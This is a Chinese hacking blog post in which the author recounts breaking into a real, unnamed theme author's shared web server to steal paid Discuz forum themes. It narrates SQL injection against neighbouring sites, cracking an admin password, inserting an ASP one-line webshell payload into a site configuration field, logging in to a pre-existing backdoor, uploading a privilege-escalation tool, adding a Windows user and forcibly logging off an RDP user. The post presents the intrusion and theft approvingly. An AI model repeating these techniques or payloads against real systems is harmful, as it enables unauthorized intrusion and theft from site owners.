危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18982168

入侵小记-拿下某收费模板

最近一直想着捣鼓一个论坛,正好过年收了点压岁钱,所以就去淘宝买了个vps,高高兴兴的把论坛架设起来了,却为找不到好的主题烦恼。就叫周围的朋友帮忙找找,最后一个哥们找到了一款让我觉得近乎完美的主题,他把作者博客地址发给我一看,我才知道是收费的主题,一看价格,我的妈呀!要1千大洋。

这哪是我等穷人买的起的,就连一个演示都木有。于是有了进入他站点盗取主题文件的想法,虽然他的博客里面不一定放着这套主题文件,但是挂个txt泻泻愤也是很爽的嘿嘿,说干就干,于是这次蛋疼的拿主题之旅就开始了。

一、踩点

打开作者的主页(隐藏免麻烦),简单的收集了下信息,一个主站,主站点是纯flash的,做的很漂亮,看来是个做主题的高手啊,跟目录下的blog文件夹是作者的blog,看了下页脚,发现是pjblog。

试了下注入漏洞发现已经修复了,手上也没有pjblog的0day,所以从blog就不好下手了,

首页就更不用说了。全flash的,最后拿出破壳扫目录挣扎下,结果也是不如人意。看来从主站是不行了,那么就来旁注吧。

二、进攻

我查了下,同服务器有20多个站点。

随便打开了几个站,发现是aspx的,找到带参数的连接后面加单引号测试,发现提示模版不存在,看来没有注入漏洞,而且几个站都是同一个系统。

继续搜索目标,找到一个asp站点,简单测试了下,发现注入也被过滤了,正当我准备换下一个站的时候,在这个站的首页发现他的sz目录下还有一个站点。进去一看和主站是不同的风格,随便找一个带参数的链接在后面加上单引号测试,发现爆错了看提示就知道是很典型的注入漏洞了,祭出我们的啊D大神,几分钟后把账号和密码跑了出来。

账号是“biaogan”,密码是md5加密的到cmd5查了下,结果为admin888。接着顺便用啊D来跑下后台吧,结果扫描到后台为admin/login.asp,高高兴兴的把账号和密码输进去后猛击回车,却给我来个密码错误!。

这下可把我给搞郁闷了,难道啊D出问题了不成?为了这明这个猜想,我用穿山甲又跑了一遍,也是这个结果,难道是后台做了手脚?或者说这个是假的后台?我马上拿出破壳扫描器对网站一顿狂扫,结果证实了我这个猜想。

打开/houtai/admin.asp后发现和前面那个页面一模一样,用前面跑出来的账号和密码尝试登录,这次登录成功了,看来管理员安全意识还是有点的,留了个后手。进入后台看了下,没有数据库备份,有上传的地方,但是类型已经过滤了,尝试上传.asp;.jpg格式的小马,发现要重命名,又把我郁闷了。突然看到网站基本信息一栏,和南方数据很相似,是否可以插马呢?这里说下南方数据后台插入一句话木马,由于该系统把网站配置信息写入到inc/config.asp文件,所以可以直接写入闭合型一句话木马,我直接访问inc/config.asp文件,出现一片空白,说明这个文件存在,但是后台又不像是南方数据,可能是改过的吧。我直接在网站信息里面的联络电话处插入闭合型一句话木马“%><%eval request(“x”)%><%Const nidaye=”。   

保存以后菜刀连接inc/config.asp,正心里想终于拿下了的时候菜刀却提示连接失败!郁闷了,现在也没有这套系统的源码,所以也不知道他的配置文件格式是怎么样的,看来这个网站又要放弃了。夜也深了,熬夜伤身体,索性就明天来搞把。在床上看着危险漫步博客的文章慢慢就睡着了。 

 

三、曙光

第二天早上起来头脑清醒了很多,继续寻找下一个目标,这次我也不急。一边吃东西一边一个个站的仔细检查,一边开着扫描器扫描其他网站的敏感文件,当检查列表最后一个aspx站点的时候发现提交单引号爆错了。

分别在后面添加“and 1=1”和“and 1=2”发现返回了不同页面,马上丢啊D里面跑去了,啊D却提示不能注入,我可是一个正宗的tools boy啊。继续换穿山甲来检测,穿山甲也提示不能注入,郁闷死了,这鸟运气。于是烦躁的关掉工具,这时发现扫描器还在扫描着一个站点随便看了下扫描出来的后台,用admin admin888等弱口令都进不去,突然看到工具扫到了editor/admin_style.asp这个文件,难道有ewebeditor吗?我马上点进去却震惊了。竟然是个webshell!   

看到这里可能有的读者会说一个shell你激动什么,你也不知道人家密码啊。不瞒您说,我还就真知道这个shell的密码。在几年前渗透我学校网站的时候也发现过这个shell,当时对这个背景图片印象很深,所以第一眼我就反映过来了。立马翻出我学校的后门上去找到了当时看到的那个shell,发现和现在这个确实是同一个。

刚才还抱怨运气不好,现在这好运气又让我给撞上了,拿找到的密码774677770成功登陆刚才扫出来的shell。     

四、胜利

马上查了下组建,发现ws组建没有被删除,提权希望很大啊,发现所有文件都可以浏览,索性我直接进入那个主题作者的网站目录,却发现没有权限,本来我还想传个aspx木马看看是否可以跨过去呢,但是想想还是先看看能提权不吧。用shell的查看可写目录查看了下c盘。

马上传个cmd到RECYCLER目录,其他可写目录也可以,只不过我习惯了这个目录传。传上去以后执行netstat -an命令看了下端口,发现3389开着,接着执行net user rices 123 /add发现没有回显,看来没有执行成功。继续传个无参pr上去,执行后返回空白,再去目录看了下发现被删了,看来有杀毒软件,找朋友要了个免杀的pr传了上去这次成功添加了用户已经加上了马上登录3389,结果却提示我超出连接限制。

看来是连接3389的人多了,继续回到shell执行命令query user来查看下当前连接3389的用户。

有一个strattes的用户,我们就T了他吧,继续输入命令logoff2,2为目标用户的ID,ID可以清楚的看到,但是却返回空,再执行下query user发现strattes用户还是连接着,看来是没有权限,这样的话就传个pr上去吧(先添加用户是传的无参数版pr,不能执行命令)。传上去以后执行CARECYCLER\pr.exe"logoff 2",执行成功了(pr是system权限)。再执行下query user看看,发现strattes用户已经被T了。

接着连接3389成功登录,找到那个主题作者的网站,找了下没有看见需要的主题的影子,继续翻。发现在他的homehomeoo\bbs目录下是一个discuz论坛(我要找的也是discuz的主题)马上转到cliscuz的主题文件夹templates,找到了我梦寐以求的主题,而且还有很多套作者收费的主题。

五、结束

经过长久的战斗,总算是拿到了自己想要的主题,这次渗透运气的成分占多,但是如果没有坚持而是放弃的话,也就没有后面所谓的运气了。不管遇到任何站点的时候多一点耐心,有时候看似费时的扫描也许会给你带来意想不到的收获!文章中的工具我会打包到一起,tools boy啥都不多,就是工具多嘿嘿!

相关推荐